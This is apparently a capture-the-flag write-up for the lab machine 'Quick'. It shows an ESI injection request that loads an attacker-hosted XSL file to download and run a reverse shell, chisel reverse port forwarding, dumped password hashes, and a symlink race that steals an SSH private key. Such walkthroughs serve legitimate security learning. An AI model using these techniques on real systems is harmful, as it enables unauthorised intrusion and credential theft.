$ nmap -p- --min-rate 5000 10.129.85.76
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 02:28 EDT
Nmap scan report for 10.129.85.76
Host is up (0.0072s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
9001/tcp open tor-orport
JetSpeed
Port 9001 had a typical corporate website:
There was a link towards a new portal hosted on portal.quick.htb. However, it pointed to port 443 and I could not access that for now. Looking at the rest of the page, we can see other information like the clients they had:
There are also some testimonials from users:
We also can note that this is a PHP website as the page above is at clients.php. A quick directory search revealed the following:
Normally, the X-Powered-By is Express or Flask or something, so this was new to me. Googling for exploits led to ESI injection:
Edge Side Inclusion Injection is similar to XML injection in syntax, and it allows us to run code and stuff. But, it doesn't appear that this login page is vulnerable, so let's keep it in mind for now.
Portal HTTP/3
The only lead left was the portal mentioned earlier. The websiter leads us to port 443 on TCP. However, why would they give us access to the service? I decided to read more about HTTPS and port 443, and found that it can actually run on UDP instead of TCP.
A quick scan reveals that UDP port 443 is indeed open.
$ sudo nmap -sU -p 443 --min-rate 10000 10.129.85.76
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 03:11 EDT
Nmap scan report for portal.quick.htb (10.129.85.76)
Host is up (0.0071s latency).
PORT STATE SERVICE
443/udp open|filtered https
So to access this, we can use a custom curl binary.
Afterwards, we can access the site using curl --http3. When we view the site, we would see this:
<html>
<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
<head>
<style>
ul {
list-style-type: none;
margin: 0;
padding: 0;
width: 200px;
background-color: #f1f1f1;
}
li a {
display: block;
color: #000;
padding: 8px 16px;
text-decoration: none;
}
/* Change the link color on hover */
li a:hover {
background-color: #555;
color: white;
}
</style>
</head>
<body>
<p> Welcome to Quick User Portal</p>
<ul>
<li><a href="index.php">Home</a></li>
<li><a href="index.php?view=contact">Contact</a></li>
<li><a href="index.php?view=about">About</a></li>
<li><a href="index.php?view=docs">References</a></li>
</ul>
</html>
Afterwards, when viewing the PDFs, we find some credentials in the Connectivity one.
Cool! This also tells us that there might be a Docker container present. Now, we need to guess the email address. Earlier, we saw a bunch of testimonials with countries. I assumed that this was a hint to guess the email somehow.
Since there's a country, I assumed that it would end in something like .fr for France or something. Then, we can take the company name and construct a company email.
This command would download a reverse shell and execute it. Now, we just need to append this to an existing ticket query like this to download and run the XML file we created:
POST /ticket.php HTTP/1.1Host:10.129.85.76:9001User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateContent-Type:application/x-www-form-urlencodedContent-Length:124Origin:http://10.129.85.76:9001Connection:closeReferer:http://10.129.85.76:9001/ticket.phpCookie:PHPSESSID=nb64nmlnnesh3nc69h2s46l7ukUpgrade-Insecure-Requests:1title=test&msg=test&id=TKT-1119;<esi:include src="http://localhost/" stylesheet="http://10.10.14.13/exe2.xsl"></esi:include>
This would download the XSL file we created. Afterwards, we need to create another one to run the file and execute commands via the same method.
The shell can be upgraded by dropping our public key into the SSH directory.
Printers
There was another user srvadm present on the machine:
sam@quick:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Mar 20 2020 .
drwxr-xr-x 24 root root 4096 Dec 14 2021 ..
drwxr-xr-x 7 sam sam 4096 May 2 07:47 sam
drwxr-xr-x 6 srvadm srvadm 4096 Mar 20 2020 srvadm
It also appears there are other websites present on the machine:
sam@quick:/var/www$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Dec 14 2021 .
drwxr-xr-x 14 root root 4096 Dec 14 2021 ..
drwxr-xr-x 2 root root 4096 Dec 14 2021 html
drwxrwxrwx 2 root root 4096 Dec 14 2021 jobs
drwxr-xr-x 6 root root 4096 Dec 14 2021 printer
We can find out who is running this website by reading the apache2 configuration files:
So there's another subdomain present. However, it seems that we cannot access it from our machine and we need some port forwarding to do this. For some reason, when we forward port 80, we cannot visit the site, but forwarding port 9001 works in visiting it.
# on kalichiselserver-p5555--reverse# on victim./chiselclient10.10.14.13:5555R:9001:127.0.0.1:9001
Then we need to add printerv2.quick.htb to our hosts file under localhost. Then, we can visit it and see a login page.
SQL Credentials
Since we have access to the machine, let's try to find the credentials for this website. Within the db.php file in the /var/www/printer folder, we see this:
Now, we can access the SQL database and find the password hash for the printer service.
mysql> select * from users\g
+--------------+------------------+----------------------------------+
| name | email | password |
+--------------+------------------+----------------------------------+
| Elisa | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
We get a hash and it's not crackable on CrackStation for some reason. I ran john and rockyou.txt didn't find anything either. Since we can't find an easy password, let's take a look at the authentication mechanism used.
<?phpinclude("db.php");if(isset($_POST["email"])&&isset($_POST["password"])){ $email=$_POST["email"]; $password = $_POST["password"]; $password =md5(crypt($password,'fa')); $stmt=$conn->prepare("select email,password from users where email=? and password=?"); $stmt->bind_param("ss",$email,$password); $stmt->execute(); $result = $stmt->get_result(); $num_rows = $result->num_rows;if($num_rows >0&& $email ==="srvadm@quick.htb") {session_start(); $_SESSION["loggedin"]=$email;header("location: home.php"); }<TRUNCATED>
So this first takes the password and then passes it to crypt, then md5. We know both the cleartext and hashed password of elisa, so we can reverse engineer this. The passing to crypt indicates why we cannot just crack this normally, because it's not just the MD5 of an encrypted password.
We can just create a quick PHP script that brute forces for us:
This does the same thing as index.php, and it compares each hash to the correct one. We can then find the correct password. We can then login to the service.
Printing LFI
We can add printers and customise them to connect to other IP addresses:
We can also make them run jobs. We obviously need to add a printer pointing to our IP address, but what do we do with it? Let's analyse the job.php file to find out more:
It appears that a job is created and this creates a file within the /var/www/jobs folder. Afterwards, it seems to send a request to the printer (us) and sends it the contents of the file. This is another race condition exploit, as we can replace the within the /var/www/jobs with a symlink to another file, like the id_rsa file of the srvadm user.
Since this is another race condition exploit, it's best to have a bash script running in the /var/www/jobs folder, which we conveniently have write access to.
Worked! Now we can use this private key to gain access to srvadm.
srvadm@quick:~$ id
uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers)
Root Creds
We are part of the printers group, which might have unique permissions. Googling about this group leads to CUPS, which is a printing system used by Arch Linux distros. We can use locate to find all files related to cups.
